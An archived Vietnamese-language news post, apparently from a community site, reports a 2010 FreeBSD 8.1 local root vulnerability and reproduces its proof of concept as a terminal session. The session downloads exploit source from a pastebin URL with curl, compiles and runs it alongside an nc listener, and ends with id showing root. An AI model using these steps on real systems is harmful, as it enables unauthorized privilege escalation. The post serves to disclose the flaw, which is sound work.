This page is READ-ONLY. It is generated from the old site.
All timestamps are relative to 2013 (when this page is generated).
If you are looking for TeX support, please go to VietTUG.org

FreeBSD: private local root exploit

:(
Added by over 2 years ago

Ref.: http://seclists.org/fulldisclosure/2010/Aug/217

Lần trước, FreeBSD 8 vừa mới công bố chưa kịp nguội thì bị dính lỗi cực kỳ nặng nề (xem (news) FreeBSD local r00t 0day). Lần này, sau khi FreeBSD 8.1 ra lò chưa lâu, thì một lỗi chết người khác được phát hiện, cho phép người dùng bình thường bất kỳ có thể chiếm quyền của root. Cách thực hiện cực kỳ đơn giản như sau đây. Ký hiệu $ , $2 để chỉ cửa sổ xterm thứ nhất hoặc thứ hai.

Thật khủng khiếp cho tay nào phát hiện lỗi này, và thật không may cho FreeBSD: hai lỗi chết người đều được phát hiện không lâu sau khi phiên bản mới được công bố.

 1 $ id
 2   uid=314(pi) gid=314(pi) groups=314(pi),0(wheel),193(cups),919(vboxusers),1005(vnmik)
 3 $ curl http://ownage.pastebin.com/raw.php?i=dyKLRr0v > cache.c
 4 $ gcc ./cache.c -o cache
 5 $ cp /bin/sh /tmp/sh
 6 $ cp /bin/sh /tmp/sh2
 7 $2 nc -l 7030
 8 $ ./cache 1 # i386
 9 $ /tmp/sh
10 $ id
11   uid=314(pi) gid=314(pi) euid=0(root) egid=0(wheel) groups=0(wheel),193(cups),919(vboxusers),1005(vnmik)
12                 ^ you are "root" now

Comments